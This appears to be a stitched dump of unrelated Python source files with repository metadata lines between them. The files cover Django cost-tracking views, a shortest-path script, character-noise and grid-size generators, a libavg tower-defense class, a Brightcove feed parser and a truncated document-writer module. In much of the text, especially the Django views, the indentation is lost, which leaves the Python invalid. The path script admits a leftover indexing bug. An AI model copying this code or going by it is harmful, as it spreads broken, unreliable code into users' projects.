return self.render_to_response(self.get_context_data(p_form=p_form, formsets=formsets))
def form_valid(self, p_form, formsets):
has_error = False
periodo = p_form.cleaned_data["periodo"]
centro_costo = p_form.cleaned_data["centro_costo"]
saved_count = 0
try:
with atomic():
for f in formsets:
if f.cleaned_data["monto_total"]:
tipo_costo = f.cleaned_data["tipo_costo"]
if self.model.objects.filter(
periodo=periodo, centro_costo=centro_costo, tipo_costo=tipo_costo).exists():
errors = f._errors.setdefault("monto_total", ErrorList())
errors.append(u"Ya existe un valor para el periodo y centro de costo seleccionado.")
has_error = True
else:
costo = self.model(**f.cleaned_data)
costo.centro_costo = centro_costo
costo.periodo = periodo
costo.save()
saved_count += 1
if has_error:
raise IntegrityError
except IntegrityError:
return self.form_invalid(p_form, formsets)
return self.response_result(p_form, formsets, saved_count)
def response_result(self, p_form, formsets, saved_count):
if saved_count:
messages.add_message(
self.request, messages.SUCCESS,
"Se añadieron correctamente {} costos al centro de costos '{}' para el periodo '{}'".format(
saved_count, p_form.cleaned_data["centro_costo"], p_form.cleaned_data["periodo"]))
return HttpResponseRedirect(reverse('costos:costos_alta_cc'))
else:
            messages.add_message(self.request, messages.WARNING, "No ingresó valores de costos")
return self.form_invalid(p_form, formsets)
class CostosAltaEquipos(BaseCostosMixin, TemplateView):
template_name = "frontend/costos/costos_eq_form.html"
form_class = CostoItemForm
model = Costo
def _form_class(self):
return PeriodoCostoTipoForm
def _get_formset(self):
return formset_factory(CostoEquipoForm, extra=0)
def get_context_data(self, **kwargs):
context = super(CostosAltaEquipos, self).get_context_data(**kwargs)
context["familias"] = self.get_queryset()
if "p_form" not in kwargs:
context["p_form"] = self._form_class()()
if "formsets" not in kwargs:
Formset = self._get_formset()
initial = [{'familia_equipo': x.pk} for x in context["familias"]]
context["formsets"] = Formset(initial=initial)
return context
def get_queryset(self, **kwargs):
return FamiliaEquipo.objects.all()
def post(self, request, *args, **kwargs):
p_form = self._form_class()(self.request.POST)
formsets = self._get_formset()(self.request.POST)
if p_form.is_valid() and formsets.is_valid():
return self.form_valid(p_form, formsets)
else:
return self.form_invalid(p_form, formsets)
def form_invalid(self, p_form, formsets):
return self.render_to_response(self.get_context_data(p_form=p_form, formsets=formsets))
def form_valid(self, p_form, formsets):
has_error = False
periodo = p_form.cleaned_data["periodo"]
tipo_costo = p_form.cleaned_data["tipo_costo"]
saved_count = 0
try:
with atomic():
for f in formsets:
if f.cleaned_data["monto_hora"] or f.cleaned_data["monto_mes"] or f.cleaned_data["monto_anio"]:
familia = f.cleaned_data["familia_equipo"]
if self.model.objects.filter(
periodo=periodo, familia_equipo=familia, tipo_costo=tipo_costo).exists():
errors = f._errors.setdefault("monto_hora", ErrorList())
errors.append(u"Ya existe un valor para el periodo y familia de equipos seleccionado.")
has_error = True
else:
costo = self.model(**f.cleaned_data)
costo.tipo_costo = tipo_costo
costo.periodo = periodo
costo.save()
saved_count += 1
if has_error:
raise IntegrityError
except CostoParametro.DoesNotExist:
messages.add_message(
self.request, messages.ERROR,
mark_safe("No están definidos los <a href='{}'>parámetros de costos</a> para el "
"periodo {}".format(reverse('admin:costos_costoparametro_changelist'), periodo)))
return self.form_invalid(p_form, formsets)
except IntegrityError:
return self.form_invalid(p_form, formsets)
return self.response_result(p_form, formsets, saved_count)
def response_result(self, p_form, formsets, saved_count):
if saved_count:
messages.add_message(
self.request, messages.SUCCESS,
"Se añadieron correctamente {} costos del tipo '{}' para el periodo '{}'".format(
saved_count, p_form.cleaned_data["tipo_costo"], p_form.cleaned_data["periodo"]))
return HttpResponseRedirect(reverse('costos:costos_alta_eq'))
else:
            messages.add_message(self.request, messages.WARNING, "No ingresó valores de costos")
return self.form_invalid(p_form, formsets)
class CargarCostosSelectView(BaseCostosMixin, TemplateView):
template_name = 'frontend/costos/modal/cargar_costos_select.html'
class EditarCostosView(BaseCostosMixin, FormWithUserMixin, ModalViewMixin, UpdateView):
model = Costo
def get_form_class(self, **kwargs):
return CostoEditPorCCForm if self.object.tipo_costo.es_por_cc else CostoEditPorEquipoForm
def get_url_post_form(self):
return reverse_lazy('costos:costos_edit', args=(self.object.pk, ))
def get_context_data(self, *args, **kwargs):
ctx = super(EditarCostosView, self).get_context_data(*args, **kwargs)
ctx["modal_title"] = 'Editar %s' % self.model._meta.verbose_name
return ctx
def form_valid(self, form):
obj = form.save()
return render(self.request, 'modal_success.html', {'obj': obj})
class EliminarCostosView(BaseCostosMixin, ModalViewMixin, DeleteView):
# http_method_names = ["post", ]
model = Costo
template_name = "modal_delete_form.html"
def get_url_post_form(self):
return reverse_lazy('costos:costos_delete', args=(self.object.pk, ))
def post(self, *args, **kwargs):
obj = self.get_object()
obj.delete()
return render(self.request, 'modal_delete_success.html', {'obj': obj})
##############################
# WORK PROGRESS (AvanceObra) #
##############################
class AvanceObraList(BaseCostosMixin, TableFilterListView):
template_name = 'frontend/costos/avance_obra_list.html'
filterset_class = AvanceObraFilter
model = AvanceObra
table_class = AvanceObraTable
def get_filterset(self, *args, **kwargs):
"""
        Only show cost centers belonging to the user's business unit.
"""
fs = super(AvanceObraList, self).get_filterset(*args, **kwargs)
fs.filters['centro_costo'].field.queryset = Obras.get_centro_costos(self.request.user)
return fs
def get_context_data(self, **kwargs):
ctx = super(AvanceObraList, self).get_context_data(**kwargs)
ctx["is_filtered"] = self.filterset.form.is_valid()
return ctx
def get_queryset(self):
return self.model.objects.filter(
centro_costo__in=Obras.get_centro_costos(self.request.user))
class AvanceObraEditView(BaseCostosMixin, FormWithUserMixin, ModalViewMixin, UpdateView):
model = AvanceObra
form_class = AvanceObraEditForm
def get_url_post_form(self):
return reverse_lazy('costos:avances_obra_edit', args=(self.object.pk, ))
def get_context_data(self, *args, **kwargs):
ctx = super(AvanceObraEditView, self).get_context_data(*args, **kwargs)
ctx["modal_title"] = 'Editar %s' % self.model._meta.verbose_name
return ctx
def form_valid(self, form):
obj = form.save()
return render(self.request, 'modal_success.html', {'obj': obj})
class AvanceObraDeleteView(BaseCostosMixin, ModalViewMixin, DeleteView):
model = AvanceObra
template_name = "modal_delete_form.html"
def get_url_post_form(self):
return reverse_lazy('costos:avances_obra_delete', args=(self.object.pk, ))
def post(self, *args, **kwargs):
obj = self.get_object()
obj.delete()
return render(self.request, 'modal_delete_success.html', {'obj': obj})
class AvanceObraCreateView(BaseCostosMixin, TemplateView):
model = AvanceObra
template_name = "frontend/costos/avance_obra_create.html"
form_class = CentroCostoSelectForm
formset_avance = formset_factory(AvanceObraCreateForm, extra=0, min_num=1, can_delete=True, validate_min=True)
def get_context_data(self, **kwargs):
context = super(AvanceObraCreateView, self).get_context_data(**kwargs)
forms = {
"obra_form": CentroCostoSelectForm(user=self.request.user, prefix='obra_form'),
"avances_formset": self.formset_avance(prefix='avances_formset'),
}
forms.update(context)
return forms
def post(self, request, *args, **kwargs):
obra_form = CentroCostoSelectForm(user=self.request.user, data=self.request.POST, prefix='obra_form')
avances_formset = self.formset_avance(self.request.POST, prefix='avances_formset')
if obra_form.is_valid() and avances_formset.is_valid():
return self.form_valid(obra_form, avances_formset)
else:
return self.form_invalid(obra_form, avances_formset)
def form_invalid(self, obra_form, avances_formset):
return self.render_to_response(self.get_context_data(obra_form=obra_form, avances_formset=avances_formset))
def form_valid(self, obra_form, avances_formset):
has_error = False
centro_costo = obra_form.cleaned_data["centro_costo"]
try:
with atomic():
for f in avances_formset.forms:
if f in avances_formset.deleted_forms:
continue
if self.model.objects.filter(
periodo=f.cleaned_data["periodo"], centro_costo=centro_costo).exists():
errors = f._errors.setdefault("avance", ErrorList())
errors.append(u"Ya existe un valor para el periodo y centro de costo seleccionado.")
has_error = True
else:
f.save(centro_costo)
if has_error:
raise IntegrityError
except IntegrityError:
return self.form_invalid(obra_form, avances_formset)
return HttpResponseRedirect(self.get_success_url(centro_costo))
def get_success_url(self, centro_costo):
messages.success(self.request, "Avances de {} guardados correctamente.".format(centro_costo))
return reverse_lazy('costos:avances_obra_list')
costos_list = CostosList.as_view()
copia_costos = CopiaCostosView.as_view()
costos_alta_cc = CostosAltaCC.as_view()
costos_alta_eq = CostosAltaEquipos.as_view()
costos_select = CargarCostosSelectView.as_view()
costos_edit = EditarCostosView.as_view()
costos_delete = EliminarCostosView.as_view()
avances_obra_list = AvanceObraList.as_view()
avances_obra_edit = AvanceObraEditView.as_view()
avances_obra_delete = AvanceObraDeleteView.as_view()
avances_obra_create = AvanceObraCreateView.as_view()
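# These module-level callables are meant to be wired into the project's URL
# conf under the 'costos' namespace (illustrative pattern; the real routes
# live in the project's urls.py):
#   url(r'^costos/$', views.costos_list, name='costos_list'),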
| gpl-2.0 | -1,134,927,434,687,782,100 | 42.098947 | 194 | 0.615768 | false | 3.59284 | false | false | false |
openworm/PyOpenWorm | examples/apsp.py | 2 | 1704 | #!/usr/bin/env python
"""
This file is used as a module in shortest_path.py
"""
from __future__ import absolute_import
from __future__ import print_function
import re
import sys
#import random as rnd
import numpy as np
import fileinput
from six.moves import range
from six.moves import zip
def lca_table_print_matrix(M,labels,item_width=1):
for i in labels:
for j in labels:
if (i, j) in M:
print("%*s" % (item_width,repr(M[(str(i), str(j))])), end=' ')
else:
print("%*s" % (item_width,"."), end=' ')
print()
def tree_from_file(file_name):
M = None
# Note, zip makes a list sized to the smaller sequence
i = 0
for line in fileinput.input(file_name):
vs = re.split(' +', line)
if i == 0:
numverts = len(vs)
M = np.zeros( (numverts + 1, numverts) )
for (v,j) in zip(vs,range(0,numverts)):
try:
k = float(v)
except Exception:
k = float('+inf')
if i == j:
k = 0
M[i,j] = k
i += 1
return M
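# Expected input file (a sketch): one whitespace-separated matrix row per
# line; non-numeric entries become +inf (no edge) and the diagonal is forced
# to 0, e.g.:
#   0 1 x
#   1 0 2
#   x 2 0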
def apsp(M):
nv = M.shape[1]
for level in range(1,nv+1):
for i in range(0,nv):
for j in range(0,nv):
                level_i = min(nv-1,level)  # was min(4, level); the hard-coded 4 looks like a leftover bug
if (M[i, level_i] + M[level_i, j] < M[i,j]):
M[i,j] = M[i, level_i] + M[level_i, j]
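# For comparison, the textbook Floyd-Warshall relaxation iterates the
# intermediate vertex k over all vertices (a sketch, not the exact variant
# implemented above):
#   for k in range(nv):
#       for i in range(nv):
#           for j in range(nv):
#               M[i, j] = min(M[i, j], M[i, k] + M[k, j])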
if __name__ == '__main__':
M = tree_from_file(sys.argv[1])
apsp(M)
numverts=M.shape[1]
for i in range(0,numverts):
for j in range(0,numverts):
print(str(int(M[i,j])) + " ", end=' ')
print()
| mit | 7,942,327,064,089,769,000 | 27.4 | 83 | 0.496479 | false | 3.126606 | false | false | false |
r-alex-hall/fontDevTools | scripts/randomNsetChars.py | 1 | 4876 | # DESCRIPTION
# Prints N variants of constructed random character sets (hard-coded but hackable: block
# characters), at X characters across and Y lines down each. Prints to either terminal or
# files; hack the global variable SAVE_TO_RND_FILENAMES to alter that; hack the other globals
# also for whatever other purposes you might have.
# SEE ALSO randomNSetChars.pde.
# DEPENDENCIES
# Python 3.8 (or maybe any 3.x version) with the random and time modules available. Moreover, Python may need to be compiled with UCS2 or UCS4 support (for the wider Unicode range used by CHARSET).
# USAGE
# Run from a python interpreter:
# python /path/to_this_script/randomNsetChars.py
# To pipe what is printed to a file, run for example:
# python /path/to_this_script/randomNsetChars.py > 1000000_randomNsetCharsVariants.txt
# NOTES
# - Hard-coded defaults print 1,000,000 rnd character set variations. So be prepared for a lot of noise.
# - Hack the global variables (under the GLOBALS comment) for your purposes if you wish.
# CODE
import random
from time import sleep
# GLOBALS
# Seeds random number generator via current time:
random.seed(None, 2)
# OR you can seed with a specific number, e.g.:
# random.seed(5, 2)
# -- and it will always produce the same output, in that case.
CHARSET = "▀▁▂▃▄▅▆▇█▉▊▋▌▍▎▏▐░▒▓▔▕▖▗▘▙▚▛▜▝▞▟■"
CHOOSE_RND_SUBSET = True
SAVE_TO_RND_FILENAMES = False
VARIANTS_TO_GENERATE = 1000000
CHARS_PER_LINE = 80
LINES_PER_GENERATED_SET = 16 # Also try e.g. 2
# The following is not used in the script if SAVE_TO_RND_FILENAMES is True.
# REFERENCE: 1,000 ms = 1 second:
WAIT_BETWEEN_LINES_MS = 142 # some oft-used choices: 82, 142
# DERIVATIVE VALUES SET FROM GLOBALS:
SLEEP_TIME = WAIT_BETWEEN_LINES_MS * 0.001
# If the controlling boolean CHOOSE_RND_SUBSET is True, the following function
# returns a random subset of unique characters from CHARSET_STRING_PARAM;
# otherwise it returns the string unmodified:
def get_charset_subset(CHARSET_STRING_PARAM):
if (CHOOSE_RND_SUBSET == True):
subset_select_percent = random.uniform(0.04,0.31)
loc_operative_charset_len = len(CHARSET_STRING_PARAM)
num_chars_in_subset = int(loc_operative_charset_len * subset_select_percent)
# If that ends up being less than two, set it to two:
if (num_chars_in_subset < 2):
num_chars_in_subset = 2
counter = 0
tmp_string = ""
while counter < num_chars_in_subset:
chosen_char = CHARSET[random.randrange(0, loc_operative_charset_len)]
if chosen_char not in tmp_string:
tmp_string += chosen_char
counter += 1
return tmp_string
else:
return CHARSET_STRING_PARAM
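# Illustrative result (the exact characters are random): with the block
# CHARSET above, get_charset_subset(CHARSET) returns between 2 characters and
# roughly 31% of the set as a string of unique characters, e.g. "▚▃▛".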
def get_rnd_save_file_name():
file_name_char_space = "abcdefghjkmnpqrstuvwxyzABCDEFGHJKMNPQRSTUVWXYZ23456789"
char_space_len = len(file_name_char_space)
file_name_str = ""
for i in range(19):
file_name_str += file_name_char_space[random.randrange(0, char_space_len)]
return file_name_str
n_set_outputs_counter = 0
digits_to_pad_file_numbers_to = len(str(VARIANTS_TO_GENERATE))
while n_set_outputs_counter < VARIANTS_TO_GENERATE:
n_set_outputs_counter += 1
    # Collect the character-noise block in a string so it can be saved to file
    # (not only printed to screen); there's a trivial performance penalty when
    # this string goes unused:
super_string = ""
operative_charset = get_charset_subset(CHARSET)
operative_charset_len = len(operative_charset)
lines_counter = 0
while lines_counter < LINES_PER_GENERATED_SET:
rnd_string = ""
char_counter = 0
while char_counter < CHARS_PER_LINE:
rnd_string += operative_charset[random.randrange(0, operative_charset_len)]
char_counter += 1
# Only print rnd block chars to terminal if we're not saving files; otherwise,
# collect them in super_string:
if (SAVE_TO_RND_FILENAMES == False):
print(rnd_string)
sleep(SLEEP_TIME)
else:
super_string += rnd_string + "\n"
lines_counter += 1
# If a boolean says to save the collected rnd chars to a file, do so:
if (SAVE_TO_RND_FILENAMES == True):
save_file_name = get_rnd_save_file_name()
# get number padded to number of zeros to align numbers to VARIANTS_TO_GENERATE,
# for file name; therefore convert n_set_outputs_counter to string for zfill function:
str_n_set_outputs_counter = str(n_set_outputs_counter)
file_number_zero_padded = str_n_set_outputs_counter.zfill(digits_to_pad_file_numbers_to)
file = open(file_number_zero_padded + "__" + save_file_name + '.txt', "w")
file.write(super_string)
file.close()
# print("DONE creating variant", n_set_outputs_counter, "in run.")
| gpl-3.0 | -5,715,836,599,177,097,000 | 42.333333 | 180 | 0.679418 | false | 3.296779 | false | false | false |
psteinb/libmultiviewnative | python/generate_dims.py | 1 | 1731 | import sys
import math
def produce_size_strings(begin, end, base=2, n_dims=3):
""" function that produces 3D grid sizes in power-of-2 manner
    example: produce_size_strings(4, 7):
16x16x16
32x16x16
32x32x16
32x32x32
64x32x32
64x64x32
64x64x64
"""
value = []
if begin > end:
print "unable to produce strings between %i and %i" % (begin, end)
return value
cardinals_exponents = range(begin, end)
cardinals = [str(int(math.pow(base, c))) for c in cardinals_exponents]
start_size = "x".join([cardinals[0]]*n_dims)
value.append(start_size)
end_size = "x".join([cardinals[-1]]*n_dims)
cardinal_idx = 1
while (start_size != end_size) and (cardinal_idx < len(cardinals)):
previous = start_size
temp_li = start_size.split("x")
for it in temp_li:
if (it == cardinals[cardinal_idx-1]):
temp_li[temp_li.index(it)] = cardinals[cardinal_idx]
break
start_size = "x".join(temp_li)
if previous != start_size:
value.append(start_size)
else:
cardinal_idx += 1
return value
if __name__ == '__main__':
sargv = sys.argv
    # Defaults below; they can be overridden through sys.argv:
begin = 6
end = 10
base = 2
if len(sargv) == 3:
begin = int(sargv[-2])
end = int(sargv[-1])
if len(sargv) == 2:
end = int(sargv[-1])
if len(sargv) == 4:
begin = int(sargv[-3])
end = int(sargv[-2])
base = int(sargv[-1])
res = produce_size_strings(begin, end, base)
if res:
print "\n".join(res)
sys.exit(0)
else:
sys.exit(1)
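# Example invocation (hypothetical values): "python generate_dims.py 6 10 2"
# prints 64x64x64, 128x64x64, 128x128x64, 128x128x128, ... up to 512x512x512.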
| gpl-2.0 | 2,539,788,888,527,334,000 | 22.391892 | 74 | 0.547083 | false | 3.147273 | false | false | false |
IronLanguages/ironpython3 | Src/Scripts/generate_dynsites.py | 3 | 1160 | # Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the Apache 2.0 License.
# See the LICENSE file in the project root for more information.
from generate import generate
MaxTypes = 16
def gen_delegate_func(cw):
for i in range(MaxTypes + 1):
cw.write("case %(length)d: return typeof(Func<%(targs)s>).MakeGenericType(types);", length = i + 1, targs = "," * i)
def gen_delegate_action(cw):
for i in range(MaxTypes):
cw.write("case %(length)d: return typeof(Action<%(targs)s>).MakeGenericType(types);", length = i + 1, targs = "," * i)
def gen_max_delegate_arity(cw):
cw.write('private const int MaximumArity = %d;' % (MaxTypes + 1))
def main():
return generate(
("Delegate Action Types", gen_delegate_action),
("Delegate Func Types", gen_delegate_func),
("Maximum Delegate Arity", gen_max_delegate_arity),
# outer ring generators
("Delegate Microsoft Scripting Action Types", gen_delegate_action),
("Delegate Microsoft Scripting Scripting Func Types", gen_delegate_func),
)
if __name__ == "__main__":
main()
| apache-2.0 | 774,702,040,638,528,100 | 35.25 | 126 | 0.663793 | false | 3.591331 | false | false | false |
libavg/mtc-geneatd | geneatd/tower.py | 1 | 5136 | #geneaTD - A multi-touch tower defense game.
#Copyright (C) 2010-2011 Frederic Kerber, Pascal Lessel, Michael Mauderer
#
#This program is free software: you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#For more information contact the geneaTD team: [email protected]
#
from libavg import *
from libavg.utils import getMediaDir
from creature import Creature
import os
import util
class Tower(object):
"""
This class represents a normal tower object.
"""
# A Map of all towers: id --> object.
towers = {}
# All creatures of player 1.
tower1 = []
# All creatures of player 2.
tower2 = []
def die(self):
"""
This method destroys the tower (unlinks the libAVG node).
"""
if self.living:
self.living = False
if self.team.id==1:
self.tower1.remove(self)
else:
self.tower2.remove(self)
del Tower.towers[id(self)]
self.towerDiv.unlink(True)
self.tower.unlink(True)
self.team.adjustScore(25)
def getDistance(self, creature):
"""
Returns the distance from the given creature to the tower.
"""
return mathutil.getDistance(self.pos, creature.getCirclePos())
def getCreaturesInExplosionRange(self):
"""
        Returns the enemy creatures that may be affected; the actual
        range check happens in executeTowerEffect.
"""
creatureList = Creature.creatures2
if self.team.id == 2:
creatureList = Creature.creatures1
return creatureList[:]
def executeTowerEffect(self, creatureList):
"""
Executes the special tower effect on the creatures that are given.
"""
        for creature in creatureList:
            dist = self.getDistance(creature)
            if dist <= self.towerCircle.r + creature.r:
                creature.damage(2)
def executeTowerDestroyAnimation(self):
"""
        The animation that happens when the tower is tapped; calls the die method when finished.
"""
self.explosionCircle = avg.CircleNode(fillopacity=0.0, strokewidth=2, color=self.destroyCircleColor, pos=(self.towerDiv.size.x // 2, self.towerDiv.size.x // 2), parent=self.towerDiv)
anim = avg.LinearAnim(self.explosionCircle, "r", 300 , self.tower.size.x // 2, self.towerCircle.r, False, None, self.die)
anim.start()
def towerExplosion(self, event):
"""
        Triggers the tower's explosion: applies the effect once, then runs the destroy animation.
"""
if not self.alreadyExploded:
self.alreadyExploded = True
self.towerDiv.sensitive = False
creatureList = self.getCreaturesInExplosionRange()
self.executeTowerEffect(creatureList)
self.executeTowerDestroyAnimation()
def setAppearance(self):
"""
A setter for the appearance of the tower.
"""
self.towerDiv = avg.DivNode(size=util.towerDivSize, pos=(self.pos.x - util.towerDivSize[0] // 2, self.pos.y - util.towerDivSize[1] // 2))
#sets the explosion radius
self.towerCircle = avg.CircleNode(fillopacity=0.3, strokewidth=0, fillcolor=self.team.color, r=self.towerDiv.size.x // 2, pos = (self.towerDiv.size.x // 2, self.towerDiv.size.y // 2), parent=self.towerDiv)
self.tower = avg.RectNode(fillopacity=1, strokewidth=0, filltexhref=os.path.join(getMediaDir(__file__, "resources"), "blackball.png"), size=util.towerSize, pos=(self.pos.x - util.towerSize[0] // 2, self.pos.y - util.towerSize[1] // 2))
def __init__(self, team, pos, layer, creatureLayer):
"""
        Creates a new tower instance (including libAVG nodes).
        team: the team the tower belongs to.
        pos: the position of the tower.
        layer: the layer the tower div should be placed on.
        creatureLayer: the layer the tower node itself is appended to.
"""
self.living = True
self.pos = pos
self.team = team
self.layer = layer
self.setAppearance()
        self.alreadyExploded = False
        self.destroyCircleColor = "FFA500"
tid = id(self)
self.towerDiv.id = str(tid)
Tower.towers[tid] = self
if self.team.name == "Team2":
Tower.tower2.append(self)
else:
Tower.tower1.append(self)
self.tower.subscribe(Node.CURSOR_DOWN, self.towerExplosion)
creatureLayer.appendChild(self.tower)
layer.appendChild(self.towerDiv)
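# Minimal usage sketch (team and the two layer nodes come from the game setup
# elsewhere in geneaTD; the position values are illustrative):
#   tower = Tower(team, avg.Point2D(100, 100), tower_layer, creature_layer)
# Tapping the tower node triggers towerExplosion(), which damages every enemy
# creature overlapping the tower circle and then destroys the tower via die().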
| gpl-3.0 | -6,594,611,462,057,214,000 | 34.178082 | 243 | 0.617017 | false | 3.807265 | false | false | false |
mdublin/Brightcove-Dynamic-Ingest-App | JSONPARSER.py | 1 | 2470 | #! /usr/bin/python
# -*- coding: utf-8 -*-
#This is a JSON parser version of our script. Sometimes you can switch a feed from JSON to MRSS by changing a parameter in the URL from 'json' to 'mrss'. But just in case...
import BC_01
import json
import requests
r = requests.get('[Insert your JSON feed URL here]')
# Parse into a separate name so the json module itself is not shadowed:
feed = json.loads(r.text)
response_array = []
#counter = 0
for index, item in enumerate(feed['items']):
if index <= 2:
print item['name']
print item['id']
#print item['FLVURL']
print item['tags']
print item['shortDescription']
#print item['adKeys']
renditions = item['renditions']
max_url = None
max_bitrate = 0
        # Since each item is a dictionary, the nested "renditions" list is
        # available as item['renditions']. renditions is itself a list of
        # dictionaries, so for each dictionary (rend) in that list we check
        # whether its encodingRate (i.e. bitrate) is larger than the biggest
        # bitrate seen so far in the renditions list; if it is, we store that
        # rendition's url and encodingRate in max_url and max_bitrate. Since
        # max_bitrate is reset to 0 above, this finds the maximum bitrate for
        # each item's rendition list.
for rend in renditions:
if rend['encodingRate'] > max_bitrate:
max_url = rend['url']
max_bitrate = rend['encodingRate']
print "MAX url", max_url, max_bitrate
#counter += 1
vid_url = max_url
item['url'] = vid_url
item['bit_rate'] = max_bitrate
response_array.append(item)
refactored = []
for entity in response_array:
new_el = entity
new_el["name"] = entity["name"]
new_el["description"] = entity["shortDescription"]
del new_el["bit_rate"]
refactored.append(new_el)
#print json.dumps(response_array, indent=4)
for idx,item in enumerate(refactored):
if idx <= 2:
name, url = item['name'], item['url']
tags = item["tags"] if "tags" in item else []
desc = item["description"] if "description" in item else ""
if not BC_01.videoNameExists(name):
print "did not see", name, "in brightcove, ingesting..."
print "working on", name, url
BC_01.createAndIngest(name, url, tags=tags, description=desc)
else:
print "already saw", name, "skipping..."
| mit | 3,602,246,432,034,681,300 | 32.378378 | 169 | 0.631984 | false | 3.681073 | false | false | false |
louistin/fullstack | Python/io/format_output_20161018.py | 1 | 1432 | #!/usr/bin/python
# _*_ coding: utf-8 _*_
import math
print ""
# str() converts a value into a form that is easy for humans to read
# repr() converts it into a form meant to be read by the interpreter
s = 'Hello, World'
print str(s)
print repr(s)
print str(1 / 7)
x = 10 * 3.25
y = 200 * 200
s = 'The value of x is ' + repr(x) + ', and y is ' + repr(y) + '...'
print s
hello = 'hello, world\n'
hellos = repr(hello)
print hello
print hellos
print repr((x, y, ('hello', 'world')))
print str((x, y, ('hello', 'world')))
for x in range(1, 11):
print repr(x).rjust(2), repr(x * x).rjust(3),
#print repr(x * x * x).rjust(4)
print repr(x * x * x).ljust(4),
print repr(x * x * x).center(4)
for x in range(1, 11):
print '{0:2d} {1:3d} {2:4d}'.format(x, x * x, x * x * x)
x = '123456'
print x.ljust(3)[:3]
y = '-3.1415'
print x.zfill(10)
print y.zfill(10)
print 'we are the {} who say "{}!"'.format('knight', 'Ni')
print 'The story of {0}, {1}, and {other}'.format('Bill', 'Manfred', other =\
'Georg')
print 'The value of PI is approximately {0:.3f}.'.format(math.pi)
table = {'Louis': 1990, 'Shana': 2006, 'Miku': 2000}
for name, birthday in table.items():
print '{0:10} ==> {1:10d}'.format(name, birthday)
print 'Louis: {0[Louis]:d}; Shana: {0[Shana]:d}; Miku: {0[Miku]:d}'\
.format(table)
print 'Louis: {Louis:d}; Shana: {Shana:d}; Miku: {Miku:d}'.format(**table)
print 'The value of PI is approximately %5.3f.' % math.pi
| mit | -3,130,768,762,048,186,400 | 20.59375 | 77 | 0.577424 | false | 2.250814 | false | false | false |
wolf9s/doconce | lib/doconce/DocWriter.py | 2 | 38975 | """
DocWriter is a tool for writing documents in ASCII, HTML,
LaTeX, DocOnce, and other formats based on input from Python
datastructures.
The base class _BaseWriter defines common functions and data
structures, while subclasses HTML, DocOnce, etc. implement (i.e.,
write to) various formats.
This module works, but is unfinished and needs documentation!
"""
from StringIO import StringIO
import re, os, glob, commands
class _BaseWriter:
"""
Base class for document writing classes.
Each subclass implements a specific format (html, latex,
rst, etc.).
"""
def __init__(self, format, filename_extension):
# use StringIO as a string "file" for writing the document:
self.file = StringIO()
self.filename_extension = filename_extension
self.format = format
self._footer_called = False
document = property(fget=lambda self: self.file.getvalue(),
doc='Formatted document as a string')
def write_to_file(self, filename):
"""
Write formatted document to a file.
Just give the stem of the file name;
the extension will be automatically added (depending on the
document format).
"""
# footer?
if not self._footer_called:
self.footer()
self._footer_called = True
f = open(filename + self.filename_extension, 'w')
f.write(self.document)
f.close()
def __str__(self):
"""Return formatted document."""
return self.document
def header(self):
"""Header as required by format. Called in constructor."""
pass
def footer(self):
"""Footer as required by format. Called in write_to_file."""
pass
def not_impl(self, method):
raise NotImplementedError, \
'method "%s" in class "%s" is not implemented' % \
(method, self.__class__.__name__)
def title(self, title, authors_and_institutions=[], date='today'):
"""
Provide title and authors.
@param title: document title (string).
@param authors_and_institutions: list of authors and their
associated institutions, where each list item is a tuple/list
with author as first element followed by the name of all
institutions this author is associated with.
@param date: None implies no date, while 'today' generates
the current date, otherwise a string is supplied.
"""
self.not_impl('title')
def today_date(self):
"""Return a string with today's date suitably formatted."""
import time
return time.strftime('%a, %d %b %Y (%H:%M)')
def section(self, title, label=None):
"""
Write a section heading with the given title and an optional
label (for navigation).
"""
self.not_impl('section')
def subsection(self, title, label=None):
"""
Write a subsection heading with the given title and an optional
label (for navigation).
"""
self.not_impl('subsection')
def subsubsection(self, title, label=None):
"""
Write a subsubsection heading with the given title and an optional
label (for navigation).
"""
self.not_impl('subsubsection')
def paragraph(self, title, ending='.', label=None):
"""
Write a paragraph heading with the given title and an ending
(period, question mark, colon) and an optional label (for navigation).
"""
self.not_impl('paragraph')
def paragraph_separator(self):
"""
Add a (space) separator between running paragraphs.
"""
self.not_impl('paragraph_separator')
def text(self, text, indent=0):
"""
Write plain text. Each line can be idented by a given number
of spaces.
"""
# do the indentation here, subclasses should call this method first
text = '\n'.join([' '*indent + line for line in text.split('\n')])
# subclasses must substitute DocOnce simple formatting
# using the expandtext method
return text
def expandtext(self, text, tags, tags_replacements):
"""
In a string text, replace all occurences of strings defined in tags
by the corresponding strings defined in tags_replacements.
Both tags and tags_replacements are dictionaries with keys such
as 'bold', 'emphasize', 'verbatim', 'math', and values consisting of
regular expression patterns.
This method allows application code to use some generic ways of
writing emphasized, boldface, and verbatim text, typically in the
DocOnce format with *emphasized text*, _boldface text_, and
`verbatim fixed font width text`.
"""
for tag in tags:
tag_pattern = tags[tag]
c = re.compile(tag_pattern, re.MULTILINE)
try:
tag_replacement = tags_replacements[tag]
except KeyError:
continue
if tag_replacement is not None:
text = c.sub(tag_replacement, text)
return text
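    # Illustrative expansion (a sketch; INLINE_TAGS is defined at module
    # level below, and HTML.INLINE_TAGS_SUBST holds the HTML replacements):
    #   w = HTML()
    #   w.expandtext('this is *important*', INLINE_TAGS, HTML.INLINE_TAGS_SUBST)
    #   # -> 'this is <em>important</em>'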
def list(self, items, listtype='itemize'):
"""
Write list or nested lists.
@param items: list of items.
@param listtype: 'itemize', 'enumerate', or 'description'.
"""
# call _BaseWriter.unfold_list to traverse the list
# and use self.item_handler to typeset each item
self.not_impl('list')
def unfold_list(self, items, item_handler, listtype, level=0):
"""
Traverse a possibly nested list and call item_handler for
each item. To be used in subclasses for easy list handling.
@param items: list to be processed.
@param item_handler: callable, see that method for doc of arguments.
@param listtype: 'itemize', 'enumerate', or 'description'.
@param level: the level of a sublist (0 is main list, increased by 1
for each sublevel).
"""
# check for common error (a trailing comma...):
if isinstance(items, tuple) and len(items) == 1:
raise ValueError, 'list is a 1-tuple, error? If there is '\
'only one item in the list, make a real Python list '\
'object instead - current list is\n(%s,)' % items
item_handler('_begin', listtype, level)
        for item in items:
if isinstance(item, (list,tuple)):
self.unfold_list(item, item_handler, listtype, level+1)
elif isinstance(item, basestring):
if listtype == 'description':
